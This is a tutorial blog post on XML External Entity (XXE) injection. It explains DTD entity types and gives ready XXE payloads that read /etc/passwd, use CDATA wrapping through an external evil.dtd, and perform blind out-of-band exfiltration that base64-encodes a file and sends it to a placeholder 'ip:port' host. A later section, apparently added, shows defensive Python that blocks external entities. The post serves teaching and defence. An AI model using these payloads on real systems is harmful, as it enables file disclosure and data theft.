Some Tips on XXE

XXE (XML External Entity Injection)

XML is a markup language that comes with a format specification called the DTD (document type definition).

Example:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >]>

Here ENTITY declares an entity. Entities are divided into internal and external entities: the one above is an internal entity (its value is given inline), and an entity that loads its content from an external DTD file is an external entity.

Example:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>

Besides referencing with SYSTEM, we can also reference a public DTD:

<!DOCTYPE root-element-name PUBLIC "DTD-public-identifier" "URI-of-the-public-DTD">

Seen from another angle, entities also fall into two kinds:

1. General entities:

Referenced as &name; declared in the DTD and referenced in the XML document.

2. Parameter entities:

Declared in the DTD as % name and referenced only within the DTD, as %name;.

Note: when declaring a parameter entity, the space between % and the entity name is mandatory.

(Parameter entities are extremely useful in blind XXE.)

XXE payloads

Normal XXE

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE vul [
<!ENTITY pwn SYSTEM "file:///etc/passwd"> ]>
<vul>&pwn;</vul>

Normal XXE (CDATA)

(When the file to be read contains characters that might cause an XML parsing error, wrapping it in CDATA makes the parser treat every character as literal content rather than XML markup.)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE vul [
<!ENTITY % start "<![CDATA[">
<!ENTITY % pwn SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd">
%dtd;]>
<vul>&all;</vul>

evil.dtd

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%pwn;%end;">

Blind XXE

When there is no echo (which is most cases) and the server is able to load an external DTD:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE vul[
<!ENTITY % remote SYSTEM "http://ip/evil.dtd">
%remote;%pwn;%send;]><vul></vul>

evil.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % pwn "<!ENTITY &#37; send SYSTEM 'http://ip:port/?f=%file;'>">

If the server reports parser errors here, the contents of %file; will also be disclosed in the error message when ip:port cannot be reached.

Tip: a file that is too long cannot be read this way; you get the error DOMDocument::loadXML(): Detected an entity reference loop in
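As an added defensive example (not code from the original post), the following Python uses the standard-library expat parser to inspect documents like the payloads above without fetching anything: it records every entity declaration, refuses (or, in non-strict mode, neutralises) external entity references, and never reads external parameter entities such as %remote;. The sample documents are constructed from the page's Normal and Blind XXE payloads.

```python
import xml.parsers.expat as expat

# Constructed samples built from the page's "Normal XXE" and "Blind XXE" payloads.
NORMAL_XXE = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE vul [
<!ENTITY pwn SYSTEM "file:///etc/passwd"> ]>
<vul>&pwn;</vul>"""

BLIND_XXE = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE vul [
<!ENTITY % remote SYSTEM "http://ip/evil.dtd">
%remote;%pwn;%send;]><vul></vul>"""


def scan_xml(doc, strict=True):
    """Parse doc with expat while fetching nothing; report what it declared,
    which external resources it tried to resolve, and (strict mode) the
    error that aborted parsing at the first external reference."""
    report = {"entities": [], "external_refs": [], "text": "", "rejected": None}
    chunks = []
    p = expat.ParserCreate()
    # External parameter entities (%remote; above) are never read, so a
    # remote evil.dtd can neither be fetched nor define %pwn; and %send;.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        kind = "parameter" if is_param else "general"
        where = "internal" if value is not None else "external"
        report["entities"].append((name, kind, where, system_id))

    def on_external_ref(context, base, system_id, public_id):
        # expat never opens a resource itself; it asks this handler.
        # Returning 0 aborts the parse, returning 1 substitutes nothing.
        report["external_refs"].append(system_id)
        return 0 if strict else 1

    p.EntityDeclHandler = on_entity_decl
    p.ExternalEntityRefHandler = on_external_ref
    p.CharacterDataHandler = chunks.append
    try:
        p.Parse(doc, True)
    except expat.ExpatError as exc:
        report["rejected"] = str(exc)
    report["text"] = "".join(chunks)
    return report


if __name__ == "__main__":
    for label, sample in (("normal", NORMAL_XXE), ("blind", BLIND_XXE)):
        print(label, scan_xml(sample))
```

The same two handlers are what a safe wrapper around a production parser needs: declared external entities are logged, and the parser never resolves them.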

Author: 12end
Link: 12end.xyz/2019/08/16/XXE/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stated otherwise.